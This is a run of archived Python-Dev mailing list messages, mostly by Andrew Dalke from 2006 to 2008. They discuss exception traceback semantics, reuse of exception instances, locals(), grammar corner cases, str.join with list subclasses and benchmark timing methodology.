I feel competent enough to comment on the latter topic.

As someone who has seen the reverse Bozo bit set by Twisted
people on everyone who makes the slightest comment towards
using any other async library, and has documented evidence as
to just why one might do so, I also feel competent enough to
comment on the branch topic.

My belief is that there are too many levels of generiticity in
Twisted.  This makes is hard for an outsider to come in and
use the system.  By "use" I include 1) understanding how the
parts go together, 2) diagnose problems and 3) adding new
features that Twisted doesn't support.

Life is trade offs.  A Twisted trade off is generiticity at the
cost of understandability.  Remember, this is all my belief,
backed by examples where I did try to understand.  My
experience with other networking packages have been much
easier, including with asyncore and Allegra.  They are not
as general purpose, but it's hard for me to believe the extra
layers in Twisted are needed to get that extra whatever
functionality.

My other belief is that async programming is hard for most
people, who would rather do "normal" programming instead
of "inside-out" programming.  Because of this 2nd belief I
am interested in something like Stackless on top of an
async library.

> As a personal anecdote, I've never once had to chase a bug through any of the
> 6 "generic calls" singled out.  I can't think of a case where I've helped any
> one else who had to do this, either.  That part of Twisted is very old, it is
> _very_ close to bug-free, and application code doesn't have very much control
> over it at all.  Perhaps in order to avoid scaring people, there should be a
> way to elide frames from a traceback (I don't much like this myself, I worry
> about it going wrong and chopping out too much information, but I have heard
> other people ask for it)?

Even though I said some of this earlier I'll elaborate for clarification.

The specific bug I was tracking down had *no* traceback.  There w

[Python-Dev] with_traceback

2007-02-26 Thread Andrew Dalke
Guido's talk at PyCon said:

>  Use raise E(arg).with_traceback(tb)
>  instead of raise E, arg, tb

That seems strange to me because of the mutability.  Looking through
the back discussions on this list I see Guido commented:
 http://mail.python.org/pipermail/python-3000/2007-February/005689.html

> Returning the mutated object is acceptable here
> because the *dominant* use case is creating and raising an exception
> in one go:
>
>  raise FooException().with_traceback()

The 3 argument raise statement is rarely used, in my experience.
I believe most don't even know it exists, excepting mostly advanced
Python programmers and language lawyers.

My concern when I saw Guido's keynote was the worry that
people do/might write code like this

NO_END_OF_RECORD = ParserError("Cannot find end of record")

def parse_record(input_file):
   ...
raise NO_END_OF_RECORD
   ...


That is, create instances at the top of the module, to be used
later.  This code assume that the NO_END_OF_RECORD
exception instance is never modified.

If the traceback is added to its __traceback__ attribute then
I see two problems if I were to write code like the above:

  - the traceback stays around "forever"
  - the code is no longer thread-safe.


As an example of code which is affected by this, see pyparsing,
which has code that looks like

class Token(ParserElement):
"""Abstract ParserElement subclass, for defining atomic matching patterns.""
"
def __init__( self ):
super(Token,self).__init__( savelist=False )
self.myException = ParseException("",0,"",self)

 
class Literal(Token):

def parseImpl( self, instring, loc, doActions=True ):
if (instring[loc] == self.firstMatchChar and
(self.matchLen==1 or instring.startswith(self.match,loc)) ):
return loc+self.matchLen, self.match
#~ raise ParseException( instring, loc, self.errmsg )
exc = self.myException
exc.loc = loc
exc.pstr = instring
raise exc

The "Literal" and other token classes are part of the
grammar definition and usually exist in module scope.



There's another question I came up with.  If the exception
already has a __traceback__, will that traceback be
overwritten if the instance is reraised?  Consider this code,
loosly derived from os._execvpe

import os, sys
_PATH = ["here", "there", "elsewhere"]

def open_file_on_path(name):
  # If nothing exists, raises an exception based on the
  # first attempt
  saved_err = None
  saved_tb = None
  for dirname in _PATH:
try:
  return open(os.path.join(dirname, name))
except Exception, err:
  if not saved_err:
saved_err = err
saved_tb = sys.exc_info()[2]
  raise saved_err.__class__, saved_err, saved_tb

open_file_on_path("spam")

which generates this

Traceback (most recent call last):
  File "raise.py", line 19, in 
open_file_on_path("spam")
  File "raise.py", line 11, in open_file_on_path
return open(os.path.join(dirname, name))
IOError: [Errno 2] No such file or directory: 'here/spam'

What is the correct way to rewrite this for use
with "with_traceback"?  Is it

def open_file_on_path(name):
  # If nothing exists, raises an exception based on the
  # first attempt
  saved_err = None
  for dirname in _PATH:
try:
  return open(os.path.join(dirname, name))
except Exception, err:
  if not saved_err:
saved_err = err
saved_tb = sys.exc_info()[2]
  raise saved_err.with_traceback(saved_err.__traceback__)


One alternative, btw, is
  raise saved_err.with_traceback()

to have it use the existing __traceback__ (and raising its
own exception if __traceback__ is None?)

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] with_traceback

2007-02-26 Thread Andrew Dalke
PJE:
> Then don't do that, as it's bad style for Python 3.x.  ;-)

It's bad style for 3.x only if Python goes with this interface.  If
it stays with the 2.x style then there's no problem.  There
may also be solutions which are cleaner and which don't
mutate the exception instance.

I am not proposing such a syntax.  I have ideas I am not a
language designer and have long given up the idea that I
might be good at it.

> This does mean you won't be able to port your code to 3.x style until
> you've gotten rid of shared exception instances from all your dependencies,
> but 3.x porting requires all your dependencies to be ported anyway.

What can be done to minimize the number of dependencies which
need to be changed?

> It should be sufficient in both 2.x and 3.x for with_traceback() to raise
> an error if the exception already has a traceback -- this should catch any
> exception instance reuse.

That would cause a problem in my example where I save then
reraise the exception, as

  raise saved_err.with_traceback(saved_err.__traceback__)

> >What is the correct way to rewrite this for use
> >with "with_traceback"?  Is it
  [...]

> No, it's more like this:
>
>  try:
>  for dirname in ...
>  try:
>  return ...
>  except Exception as err:
> saved_err = err
>  raise saved_err
>  finally:
>  del saved_err

I don't get it.  The "saved_err" has a __traceback__
attached to it, and is reraised.  Hence it gets the old
stack, right?

Suppose I wrote

ERR = Exception("Do not do that")

try:
  f(x)
except Exception:
  raise ERR

try:
  f(x*2)
except Exception:
  raise ERR

Yes it's bad style, but people will write it.  The ERR gets
the traceback from the first time there's an error, and
that traceback is locked in ... since raise won't change
the __traceback__ if one exists.  (Based on what you
said it does.)


> I've added the outer try-finally block to minimize the GC impact of the
> *original* code you showed, as the `saved_tb` would otherwise have created
> a cycle.  That is, the addition is not because of the porting, it's just
> something that you should've had to start with.

Like I said, I used code based on os._execvpe.  Here's the code

saved_exc = None
saved_tb = None
for dir in PATH:
fullname = path.join(dir, file)
try:
func(fullname, *argrest)
except error, e:
tb = sys.exc_info()[2]
if (e.errno != ENOENT and e.errno != ENOTDIR
and saved_exc is None):
saved_exc = e
saved_tb = tb
if saved_exc:
raise error, saved_exc, saved_tb
raise error, e, tb

I see similar use in atexit._run_exitfuncs, though as Python
is about to exit it won't make a real difference.

doctest shows code like

 >>> exc_info = failure.exc_info
 >>> raise exc_info[0], exc_info[1], exc_info[2]

SimpleXMLRPCServer does things like

except:
# report exception back to server
exc_type, exc_value, exc_tb = sys.exc_info()
response = xmlrpclib.dumps(
xmlrpclib.Fault(1, "%s:%s" % (exc_type, exc_value)),
encoding=self.encoding, allow_none=self.allow_none,
)


I see threading.py gets it correctly.

My point here is that most Python code which uses the traceback
term doesn't break the cycle, so must be caught by the gc.  While
there might be a more correct way to do it, it's too complicated
for most to get it right.

> Anyway, the point here is that in 3.x style, most uses of 3-argument raise
> just disappear altogether.  If you hold on to an exception instance, you
> have to be careful about it for GC, but no more so than in current Python.

Where people already make a lot of mistakes.  But my concern
is not in the gc, it's in the mutability of the exception causing hard
to track down problems in code which is written by beginning to
intermediate users.

> The "save one instance and use it forever" use case is new to me - I've
> never seen nor written code that uses it before now.  It's definitely
> incompatible with 3.x style, though.

I pointed out an example in pyparsing.  Thomas W. says he's
seen other code.  I've been looking for another real example but
as this is relatively uncommon code, I don't have a wide enough
corpus for the search.  I also don't know of a good tool for searching
for this sort of thing.  (Eg, www.koders.com doesn't help.)

It's a low probability occurance.  So is the use of the 3 arg raise.
Hence it's hard to get good intuition about problems which might
arise.

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] with_traceback

2007-02-28 Thread Andrew Dalke
Glyph:
> This seems like kind of a strange micro-optimization to have an impact
> on a language change discussion.

Just as a reminder, my concern is that people reuse exceptions (rarely)
and that the behavior of the "with_exceptions()" method is ambiguous
when that happens.  It has nothing to do with optimization.

The two solutions of:
  1. always replace an existing __traceback__
  2. never replace an existing __traceback__
both seem to lead to problems.

Here are minimal examples for thought:

# I know PJE says this is bad style for 3.0.  Will P3K help
# identify this problem?  If it's allowable, what will it do?
# (Remember, I found existing code which reuses exceptions
# so this isn't purely theoretical, only rare.)

BAD = Exception("that was bad")
try:
  raise BAD
except Exception:
  pass
raise BAD  # what traceback will be shown here?

(Oh, and what would a debugger report?)

# 2nd example; reraise an existing exception instance.
# It appears that any solution which reports a problem
# for #1 will not allow one or both of the following.

try:
  raise Exception("bad")
except Exception as err:
  first_err = err
try:
  raise Exception("bad")
except Exception:
  raise first_err  # what traceback will be shown here?

# 3rd example, like the 2nd but end it with

  raise first_err.with_exception(first_err.__traceback__)  # what
traceback will be shown here?



> I'm sorry if this has been proposed already in this discussion (I
> searched around but did not find it),

I saw references to a PEP about it but could not find the PEP.
Nor could I find much discussion either.  I would like to know
the details.  I assume that "raise" adds the __traceback__ if
it's not None, hence there's no way it can tell if the __traceback__
on the instance was created with "with_traceback()" from an
earlier "raise" or from the with_traceback.

But in the current examples it appears that the Exception class
could attach a traceback during instantiation and "with_traceback"
simply replaces that. I doubt this version, but cannot be definitive.

While variant method/syntax may improve matters, I think people
will write code as above -- all of which are valid Python 2.x and
3.x -- and end up with strange and hard to interpret tracebacks.

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] with_traceback

2007-02-28 Thread Andrew Dalke
On 2/28/07, James Y Knight <[EMAIL PROTECTED]> wrote:
> It seems to me that a stack trace should always be attached to an
> exception object at creation time of the exception, and never at any
> other time. Then, if someone pre-creates an exception object, they
> get consistent and easily explainable behavior (the traceback to the
> creation point). The traceback won't necessarily be *useful*, but
> presumably someone pre-creating an exception object did so to save
> run-time, and creating the traceback is generally very expensive, so
> doing that only once, too, seems like a win to me.

The only example I found in about 2 dozen packages where the
exception was precreated was in pyparsing.  I don't know the reason
why it was done that way, but I'm certain it wasn't for performance.

The exception is created as part of the format definition.  In that
case if the traceback is important then it's important to know which
code was attempting the parse.  The format definition was probably
certainly done at module import time.

In any case, reraising the same exception instance is a rare
construct in current Python code.  PJE had never seen it before.
It's hard to get a good intuition from zero data points.  :)
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] with_traceback

2007-03-02 Thread Andrew Dalke
On 3/1/07, Guido van Rossum <[EMAIL PROTECTED]> wrote:
> Since by far the most common use case is to create the
> exception in the raise statement, the behavior there won't be any
> different than it is today; the traceback on precreated objects will
> be useless, but folks who precreate them for performance reasons
> presumably won't care; and those that create global exception
> instances by mistakenly copying the wrong idiom, well, they'll learn
> quickly (and a lot more quickly than when we try to override the
> exception).

Here's a few more examples of code which don't follow the idiom

  raise ExceptionClass(args)


Zope's ZConfig/cmdline.py

def addOption(self, spec, pos=None):
if pos is None:
pos = "", -1, -1
if "=" not in spec:
e = ZConfig.ConfigurationSyntaxError(
"invalid configuration specifier", *pos)
e.specifier = spec
raise e


The current xml.sax.handler.Error handler includes

def error(self, exception):
"Handle a recoverable error."
raise exception

def fatalError(self, exception):
"Handle a non-recoverable error."
raise exception

and is used like this in xml.sax.expatreader.ExpatParser.feed

try:
# The isFinal parameter is internal to the expat reader.
# If it is set to true, expat will check validity of the entire
# document. When feeding chunks, they are not normally final -
# except when invoked from close.
self._parser.Parse(data, isFinal)
except expat.error, e:
exc = SAXParseException(expat.ErrorString(e.code), e, self)
# FIXME: when to invoke error()?
self._err_handler.fatalError(exc)

Note that the handler may decide to ignore the exception,
based on which error occured.  The traceback should show
where in the handler the exception was raised, and not
the point at which the exception was created.


ZODB/Connection.py:
...
if isinstance(store_return, str):
assert oid is not None
self._handle_one_serial(oid, store_return, change)
else:
for oid, serial in store_return:
self._handle_one_serial(oid, serial, change)

def _handle_one_serial(self, oid, serial, change):
if not isinstance(serial, str):
raise serial
...

   Andrew
   [EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Another traceback idea [was: except Exception as err, tb]

2007-03-02 Thread Andrew Dalke
On 3/2/07, Greg Ewing <[EMAIL PROTECTED]> wrote:
> This has given me another idea:
   ...
> Now, I'm not proposing that the raise statement should
> actually have the above syntax -- that really would be
> a step backwards. Instead it would be required to have
> one of the following forms:
>
> raise ExceptionClass
>
> or
>
> raise ExceptionClass(args)
>
> plus optional 'with traceback' clauses in both cases.
> However, the apparent instantiation call wouldn't be
> made -- it's just part of the syntax.

Elsewhere here I listed several examples of existing
code which raises an instance which was caught or
created earlier.  That would not be supported if the
raise had to be written in your given forms.

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] PEP 344 (was: with_traceback)

2007-03-02 Thread Andrew Dalke
On 3/2/07, Guido van Rossum <[EMAIL PROTECTED]> wrote:
> So, despite the existence of libraries that pre-create exceptions, how
> bad would it really be if we declared that use unsafe? It wouldn't be
> hard to add some kind of boobytrap that goes off when pre-created
> exceptions are raised multiple times. If this had always been the
> semantics I'm sure nobody would have complained and I doubt that it
> would have been a common pitfall either (since if it doesn't work,
> there's no bad code abusing it, and so there are no bad examples that
> newbies could unwittingly emulate).

Here's code from os._execvpe which reraises an exception
instance which was created earlier

saved_exc = None
saved_tb = None
for dir in PATH:
fullname = path.join(dir, file)
try:
func(fullname, *argrest)
except error, e:
tb = sys.exc_info()[2]
if (e.errno != ENOENT and e.errno != ENOTDIR
and saved_exc is None):
saved_exc = e
saved_tb = tb
if saved_exc:
raise error, saved_exc, saved_tb
raise error, e, tb

Would the boobytrap go off in this case?  I think it would,
because a "saved_exc" is raised twice.

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Performance of pre-creating exceptions?

2007-03-02 Thread Andrew Dalke
On 3/2/07, Adam Olsen <[EMAIL PROTECTED]> wrote:
> We can get more than half of the benefit simply by using a default
> __init__ rather than a python one.  If you need custom attributes but
> they're predefined you could subclass the exception and have them as
> class attributes.  Given that, is there really a need to pre-create
> exceptions?

The only real world example of (re)using pre-computed exceptions
I found was in pyparsing.  Here are two examples:

def parseImpl( self, instring, loc, doActions=True ):
if (instring[loc] == self.firstMatchChar and
(self.matchLen==1 or instring.startswith(self.match,loc)) ):
return loc+self.matchLen, self.match
#~ raise ParseException( instring, loc, self.errmsg )
exc = self.myException
exc.loc = loc
exc.pstr = instring
raise exc

(The Token's constructor is

class Token(ParserElement):
def __init__( self ):
super(Token,self).__init__( savelist=False )
self.myException = ParseException("",0,"",self)

and the exception class uses __slots__ thusly:

class ParseBaseException(Exception):
"""base exception class for all parsing runtime exceptions"""
__slots__ = ( "loc","msg","pstr","parserElement" )
# Performance tuning: we construct a *lot* of these, so keep this
# constructor as small and fast as possible
def __init__( self, pstr, loc, msg, elem=None ):
self.loc = loc
self.msg = msg
self.pstr = pstr
self.parserElement = elem


so you can see that each raised exception modifies 2 of
the 4 instance variables in a ParseException.)

-and-

# this method gets repeatedly called during backtracking with the
same arguments -
# we can cache these arguments and save ourselves the trouble of re-parsing
# the contained expression
def _parseCache( self, instring, loc, doActions=True, callPreParse=True ):
lookup = (self,instring,loc,callPreParse)
if lookup in ParserElement._exprArgCache:
value = ParserElement._exprArgCache[ lookup ]
if isinstance(value,Exception):
if isinstance(value,ParseBaseException):
value.loc = loc
raise value
return value
else:
try:
ParserElement._exprArgCache[ lookup ] = \
value = self._parseNoCache( instring, loc,
doActions, callPreParse )
return value
except ParseBaseException, pe:
ParserElement._exprArgCache[ lookup ] = pe
raise


The first definitely has the look of a change for better performance.
I have not asked the author nor researched to learn how much gain
there was with this code.

Because the saved exception is tweaked each time (hence not
thread-safe), your timing tests aren't directly relevant as your
solution of creating the exception using the default constructor
then tweaking the instance attributes directly would end up
doing 4 setattrs instead of 2.

% python -m timeit -r 10 -n 100 -s 'e = Exception()' 'try: raise
e' 'except: pass'
100 loops, best of 10: 1.55 usec per loop
% python -m timeit -r 10 -n 100 -s 'e = Exception()' 'try:
e.x=1;e.y=2;raise e' 'except: pass'
100 loops, best of 10: 1.98 usec per loop

so 4 attributes should be about 2.5usec, or 25% slower than 2 attributes.


There's also a timing difference between looking for the exception
class name in module scope vs. using self.myException

I've tried to find other examples but couldn't in the 20 or so packages
I have on my laptop.  I used searches like

# find module variables assigned to exception instances
egrep "^[a-z].*=.*Error\(" *.py
egrep "^[a-z].*=.*Exception\(" *.py

# find likely instances being raised
grep "^ *raise [a-z]" *.py
# find likely cases of 3-arg raises
grep "^ *raise .*,.*," *.py

to find candidates.  Nearly all false positives.

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] locals(), closures, and IronPython...

2007-03-06 Thread Andrew Dalke
On 3/5/07, Guido van Rossum <[EMAIL PROTECTED]> wrote:
> I don't know too many good use cases for
> locals() apart from "learning about the implementation" I think this
> might be okay.

Since I'm watching this list for any discussion on the traceback
threads, I figured I would point out the most common use I know
for locals() is in string interpolation when there are many local
variables, eg:

   a = "spam"
   b = "egg"
...
   y = "foo"
   z = "bar"

  print fmtstr % locals()

The next most is to deal with a large number of input parameters, as
this from decimal.py:

def __init__(self, prec=None, rounding=None,
 traps=None, flags=None,
 _rounding_decision=None,
 Emin=None, Emax=None,
 capitals=None, _clamp=0,
 _ignored_flags=None):
  ...
for name, val in locals().items():
if val is None:
setattr(self, name, _copy.copy(getattr(DefaultContext, name)))
else:
setattr(self, name, val)

and this example based on a post of Alex Martelli's:

def __init__(self, fee, fie, foo, fum):
self.__dict__.update(locals())
del self.self

In both cases they are shortcuts to "reduce boilerplate".

I've more often used the first form in my code.  If an
inner local returned a superset of the items it returns now,
I would not be concerned.

I've rarely used the 2nd form in my code.  The only way
I can see there being a problem is if a function defines
a class, which then uses the locals() trick, because

>>> def blah():
...a = 6; b = 7
...class XYZ(object):
...  def __init__(self):
...c = a
...print "in the class", locals()
...print "in the function", locals()
...XYZ()
...
>>> blah()
in the function {'a': 6, 'XYZ': , 'b': 7}
in the class {'a': 6, 'c': 6, 'self': <__main__.XYZ object at 0x72ad0>}

the code in the class's initializer will have more locals.  I've
never seen code like this (class defined in a function, with __init__
using locals()) and it's not something someone would write
thinking it was a standard way of doing things.


In both cases I'm not that bothered if it's implementation specific.
Using locals has the feel of being too much like a trick to get
around having to type so much.  That's what editor macros are for :)

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] locals(), closures, and IronPython...

2007-03-06 Thread Andrew Dalke
On 3/6/07, Mike Klaas <[EMAIL PROTECTED]> wrote:
> There's nothing quite like running help(func) and getting *args,
> **kwargs as the documented parameter list.

I think

>>> import resource
>>> help(resource.getpagesize)
Help on built-in function getpagesize in module resource:

getpagesize(...)


is pretty close.  :)

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


[Python-Dev] small Grammar questions

2008-02-19 Thread Andrew Dalke
I'm finishing up a PLY lexer and parser for the current CVS version of
the Python grammar.  As part of it I've been testing a lot of dark
corners in the grammar definition and implementation.  Python 2.5 has
some small and rare problems which I'm pleased to note have been
pretty much fixed in Python 2.6.

I have two questions about the grammar definition.  Here's a
difference between 2.5 and 2.6.

% cat x.py
c = "This is 'c'"
def spam((a) = c):
  print a
spam()

% python2.5 x.py
This is 'c'
% python2.6 x.py
  File "x.py", line 2
def spam((a) = c):
SyntaxError: non-default argument follows default argument


I don't understand why that's changed.  This shouldn't be a
SyntaxError and there is no non-default argument following the default
argument.

Note that this is still valid

>>> def spam((a,) = c):
...   pass
...

I think 2.6 is incorrect.  According to the documentation at
  http://docs.python.org/ref/function.html

defparameter::= parameter ["=" expression]
sublist ::= parameter ("," parameter)* [","]
parameter   ::= identifier | "(" sublist ")"
funcname::= identifier


Second question is about trailing commas in list comprehension.  I
don't understand why the commented out line is not allowed.

[x for x in 1]
#[x for x in 1,]  # This isn't legal
[x for x in 1,2]
[x for x in 1,2,]
[x for x in 1,2,3]

The Grammar file says

# Backward compatibility cruft to support:
# [ x for x in lambda: True, lambda: False if x() ]
# even while also allowing:
# lambda x: 5 if x else 2
# (But not a mix of the two)
testlist_safe: old_test [(',' old_test)+ [',']]

but if I change it to also allow

testlist_safe : old_test ','

then PLY still doesn't report any ambiguities in the grammar and I
can't find an expression that exhibits a problem.

Could someone here enlighten me?

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] small Grammar questions

2008-02-19 Thread Andrew Dalke
On Feb 19, 2008 1:38 PM, Andrew Dalke <[EMAIL PROTECTED]> wrote:
> def spam((a) = c):
>   print a

On Feb 20, 2008 12:29 AM, Brett Cannon <[EMAIL PROTECTED]> wrote:
> The error might be odd, but I don't see why that should be allowed
> syntax. Having a parameter surrounded by a parentheses like that makes
> no sense in a context of a place where arbitrary expressions are not
> allowed.

I'm fine with that.  This is a corner that no one but language lawyers
will care about.  The thing is, the online documentation and the
Grammar file allow it, as did Python 2.5.

In any case, the error message is not helpful.

> From what I can tell the grammar does not prevent it. But it is
> possible that during AST creation or bytecode compilation a specific
> check is made that is throwing the exception...

In my code it's during AST generation...  Your pointer to ast.c:672
was helpful.  It's stuff  jeremy.hylton did in r54415.  Now I have to
figure out how Python's internal ASTs work..  Which might take a
while.

> Are you asking why the decision was made to make the expression
> illegal, or why the grammar is flagging it is wrong?

Why it's illegal.  Supporting a comma doesn't seem to make anything
ambiguous, but PLY's LALR(1) might handle things that Python itself
doesn't and I don't have the experience to tell.

There are other places where the grammar definition allows syntax that
is rejected later on.  Those I can justify by saying it's easier to
define the grammar that way (hence f(1+1=2) is legal grammar but
illegal Python), or to produce better error messages (like "from .a
import *").

But this one prohibiting [x for x in 1,] I can't figure out.


   Andrew
   [EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] small Grammar questions

2008-02-19 Thread Andrew Dalke
Okay, my conclusion is

  def f((a)=5)

is wrong, and the code should be changed to report a better error
message.  I'll file a bug against that.

and I'm going with Brett suggestion that

  [x for x in 1,]

is not supported because it's almost certainly a programming error.  I
think therefore the comment in the Grammar file is distracting.  As
comments can be.


On Feb 20, 2008 3:08 AM, Steve Holden <[EMAIL PROTECTED]> wrote:
> The one that surprised me was the legality of
>
>  def eggs((a, )=c):
>  pass
>
> That just seems like unpacking-abuse to me.

Yep.  Here's another abuse, since I can't figure when someone needs a
destructuring del statement.

>>> class X(object): pass
...
>>> X.a = 123
>>> X.b = "hello"
>>> X.c = 9.801
>>> X.a, X.b, X.c
(123, 'hello', 9.8012)
>>> del (X.a, (X.b, (X.c,)))
>>> X.a, X.b, X.c
Traceback (most recent call last):
  File "", line 1, in 
AttributeError: type object 'X' has no attribute 'a'
>>>

Is this going to be possible in Python3k?

> You really *have* been poking around in little-known crevices, haven't you?

Like this bug from 2.5, fixed in 2.6

>>> from __future__ import with_statement
>>> with f(x=5, 6):
...   pass
...
ValueError: field context_expr is required for With

  :)

Andrew
[EMAIL PROTECTED]
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


[Python-Dev] PySequence_Fast_GET_ITEM in string join

2006-05-23 Thread Andrew Dalke
The Sourceforge tracker is kaputt so I'm sending it here, in part
because the effbot says it's interesting.

I can derive from list and override __getitem__

 >>> class Spam(list):
...   def __getitem__(self, i):
... print i
... return 2
...
 >>> Spam()[1]
1
2
 >>> Spam()[9]
9
2
 >>>

Now consider the following

 >>> class Spam(list):
...   def __getitem__(self, i):
... print "Asking for", i
... if i == 0: return "zero"
... if i == 1: return "one"
... raise IndexError, i
...
 >>> Spam()[1]
Asking for 1
'one'
 >>>

Spiffy!  For my next trick

 >>> "".join(Spam())
''
 >>>

The relevant code in stringobject uses PySequence_Fast_GET_ITEM(seq, i),
which likely doesn't know about my derived __getitem__.

 p = PyString_AS_STRING(res);
 for (i = 0; i < seqlen; ++i) {
 size_t n;
 item = PySequence_Fast_GET_ITEM(seq, i);
 n = PyString_GET_SIZE(item);
 memcpy(p, PyString_AS_STRING(item), n);
 p += n;
 if (i < seqlen - 1) {
 memcpy(p, sep, seplen);
 p += seplen;
 }
 }


The Unicode join has the same problem

 >>> class Spam(list):
...   def __getitem__(self, i):
... print "Asking for", i
... if i == 0: return "zero"
... if i == 1: return u"one"
... raise IndexError, i
...
 >>> "".join(Spam())
''

While if my class is not derived from list, everything is copacetic.

 >>> class Spam:
...   def __getitem__(self, i):
... print "Asking for", i
... if i == 0: return "zero"
... if i == 1: return u"one"
... raise IndexError, i
...
 >>> "".join(Spam())
Asking for 0
Asking for 1
Asking for 2
u'zeroone'
 >>>

Ditto for deriving from object.

 >>> class Spam(object):
...   def __getitem__(self, i):
... print "Asking for", i
... if i == 0: return "zero"
... if i == 1: return "one"
... raise IndexError, i
...
 >>> "".join(Spam())
Asking for 0
Asking for 1
Asking for 2
'zeroone'
 >>>

Andrew
[EMAIL PROTECTED]

___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] PySequence_Fast_GET_ITEM in string join

2006-05-23 Thread Andrew Dalke
Me [Andrew Dalke] said:
> The relevant code in stringobject uses PySequence_Fast_GET_ITEM(seq, 
> i),
> which likely doesn't know about my derived __getitem__.

Oops, I didn't know what the code was doing well enough.  The
relevant problem is

 seq = PySequence_Fast(orig, "");

That calls __iter__ on my derived list object, which knows nothing
about my overridden __getitem__

So things are working as designed.

Well, back to blundering about.  Too much brennivin. ;)

Andrew
[EMAIL PROTECTED]

___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python Benchmarks

2006-06-02 Thread Andrew Dalke

M.-A. Lemburg:

The approach pybench is using is as follows:

...

 The calibration step is run multiple times and is used
 to calculate an average test overhead time.


One of the changes that occured during the sprint was to change this algorithm
to use the best time rather than the average.  Using the average assumes a
Gaussian distribution.  Timing results are not.  There is an absolute best but
that's rarely reached due to background noise.  It's more like a gamma
distribution
plus the minimum time.

To show the distribution is non-Gaussian I ran the following

def compute():
   x = 0
   for i in range(1000):
   for j in range(1000):
   x += 1

def bench():
   t1 = time.time()
   compute()
   t2 = time.time()
   return t2-t1

times = []
for i in range(1000):
   times.append(bench())

print times

The full distribution is attached as 'plot1.png' and the close up
(range 0.45-0.65)
as 'plot2.png'.  Not a clean gamma function, but that's a closer match than an
exponential.

The gamma distribution looks more like a exponential function when the shape
parameter is large.  This corresponds to a large amount of noise in the system,
so the run time is not close to the best time.  This means the average approach
works better when there is a lot of random background activity, which is not the
usual case when I try to benchmark.

When averaging a gamma distribution you'll end up with a bit of a
skew, and I think
the skew depends on the number of samples, reaching a limit point.

Using the minimum time should be more precise because there is a
definite lower bound and the machine should be stable.  In my test
above the first few results are

0.472838878632
0.473038911819
0.473326921463
0.473494052887
0.473829984665

I'm pretty certain the best time is 0.4725, or very close to that.
But the average
time is 0.58330151391 because of the long tail.  Here are the last 6 results in
my population of 1000

1.76353311539
1.79937505722
1.82750201225
2.01710510254
2.44861507416
2.90868496895

Granted, I hit a couple of web pages while doing this and my spam
filter processed
my mailbox in the background...

There's probably some Markov modeling which would look at the number
and distribution of samples so far and assuming a gamma distribution
determine how many more samples are needed to get a good estimate of
the absolute minumum time.  But min(large enough samples) should work
fine.


If the whole suite runs in 50 seconds, the per-test
run-times are far too small to be accurate. I usually
adjust the warp factor so that each *round* takes
50 seconds.


The stringbench.py I wrote uses the timeit algorithm which
dynamically adjusts the test to run between 0.2 and 2 seconds.


That's why the timers being used by pybench will become a
parameter that you can then select to adapt pybench it to
the OS your running pybench on.


Wasn't that decision a consequence of the problems found during
the sprint?

   Andrew
   [EMAIL PROTECTED]


plot1.png
Description: PNG image


plot2.png
Description: PNG image
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python Benchmarks

2006-06-02 Thread Andrew Dalke
On 6/2/06, Terry Reedy <[EMAIL PROTECTED]> wrote:
> Hardly a setting in which to run comparison tests, seems to me.

The point though was to show that the time distribution is non-Gaussian,
